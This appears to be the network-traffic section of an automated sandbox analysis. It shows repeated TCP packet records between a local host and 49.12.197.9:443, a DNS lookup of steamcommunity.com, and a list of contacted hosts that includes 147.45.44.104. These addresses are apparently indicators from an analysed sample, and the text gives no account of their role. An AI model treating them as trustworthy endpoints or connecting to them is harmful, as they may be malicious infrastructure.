                                                                                                                          Oct 3, 2024 03:27:08.408551931 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.408577919 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.408601046 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.418275118 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.418289900 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.418356895 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.418364048 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.418416977 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.438254118 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.438267946 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.438344002 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.438353062 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.438386917 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.453799963 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.453814983 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.453890085 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.453898907 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.453937054 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.464219093 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.464235067 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.464298010 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.464314938 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.464354038 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.472919941 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.472933054 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.473004103 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.473011971 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.473045111 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.482956886 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.482971907 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.483072996 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.483088017 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.483129978 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.490430117 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.490443945 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.490537882 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.490557909 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.490595102 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.504582882 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.504595995 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.504651070 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.504659891 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.504709959 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.509367943 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.509381056 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.509463072 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.509469986 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.509509087 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.529048920 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.529062033 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.529221058 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.529228926 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.529272079 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.544719934 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.544733047 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.544792891 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.544799089 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.544842005 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.555049896 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.555119038 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.555285931 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.555346966 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.565284014 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.565298080 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.565341949 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.565350056 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.565356970 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.565382957 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.574841976 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.574855089 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.574914932 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.574920893 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.574956894 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.581571102 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.581583977 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.581638098 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.581644058 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.581682920 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.595113993 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.595132113 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.595217943 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.595235109 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.595271111 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.600682020 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.600697041 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.600763083 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.600770950 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.600814104 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.620131016 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.620146036 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.620209932 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.620230913 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.620269060 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.635478973 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.635493994 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.635584116 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.635592937 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.635634899 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.646120071 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.646133900 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.646224022 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.646233082 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.646277905 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.655051947 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.655066967 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.655123949 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.655133009 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.655172110 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.658077955 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.664705038 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.664721966 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.664782047 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.664796114 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.664839029 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.672131062 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.672147036 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.672214985 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.672221899 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.672264099 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.685854912 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.685868025 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.685931921 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.685940027 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.685993910 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.690973043 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.690987110 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.691063881 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.691071033 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.691239119 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.710799932 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.710814953 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.710885048 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.710907936 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.710949898 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.726244926 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.726264954 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.726340055 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.726349115 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.726387978 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.736762047 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.736776114 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.736843109 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.736850977 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.737020969 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.745670080 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.745683908 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.745743036 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.745749950 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.745788097 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.180919886 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.192723036 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.192743063 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.192817926 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.192826986 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.192878008 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.202545881 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.202564001 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.202656984 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.202672005 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.202748060 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.210791111 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.210804939 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.210880995 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.210887909 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.210923910 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.223392010 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.223404884 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.223566055 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.223572969 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.223623991 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.231709003 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.231728077 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.231795073 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.231801033 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.231837034 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.237770081 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.237782955 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.237857103 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.237864017 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.237910986 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.259344101 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.259358883 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.259569883 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.259576082 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.259629965 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.271311998 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.271325111 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.271411896 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.271419048 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.271460056 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.283557892 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.283574104 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.283677101 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.283687115 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.283729076 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.293430090 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.293447971 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.293519974 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.293531895 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.293574095 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.301793098 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.301806927 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.301904917 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.301913023 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.301961899 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.313576937 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.313595057 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.313697100 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.313704967 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.313766956 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.322623014 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.322638035 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.322717905 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.322726965 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.322768927 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.328666925 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.328680992 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.328763962 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.328773975 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.328821898 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.349993944 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.350009918 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.350089073 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.350102901 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.350147009 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.365259886 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.365273952 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.365443945 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.365451097 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.365504980 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.386661053 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.386676073 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.386805058 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.386811972 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.386975050 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.394500971 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.394514084 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.394577026 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.394582987 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.394625902 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.396893024 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.396910906 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.396964073 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.396970987 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.397008896 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.404001951 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.404078007 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.404103994 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.404110909 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.404139996 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.404160023 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.413832903 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.413875103 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.413917065 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.413929939 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.413943052 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.413964033 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.419181108 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.419224977 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.419264078 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.419270039 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.419292927 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.419313908 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.441128969 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.441174030 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.441313982 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.441345930 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.441397905 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.456657887 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.456732035 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.456763029 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.456775904 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.456800938 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.456818104 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.456876040 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.456989050 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.457498074 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.457515955 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.993115902 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.993159056 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.993242025 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.993459940 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.993474007 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:10.650268078 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:10.650405884 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:10.650919914 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:10.650928974 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:10.653345108 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:10.653345108 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:10.653354883 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:10.653373003 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385039091 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385113001 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.385149002 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385201931 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.385211945 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385255098 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.385296106 CEST4435796349.12.197.9192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 03:26:37.956768036 CEST | 53 | 55381 | 1.1.1.1 | 192.168.2.7
Oct 3, 2024 03:26:41.112675905 CEST | 61628 | 53 | 192.168.2.7 | 1.1.1.1
Oct 3, 2024 03:26:41.140671968 CEST | 53 | 61628 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 03:26:41.112675905 CEST | 192.168.2.7 | 1.1.1.1 | 0x4f36 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 03:26:41.140671968 CEST | 1.1.1.1 | 192.168.2.7 | 0x4f36 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
                                                                                                                          • steamcommunity.com
                                                                                                                          • 49.12.197.9
                                                                                                                          • 147.45.44.104
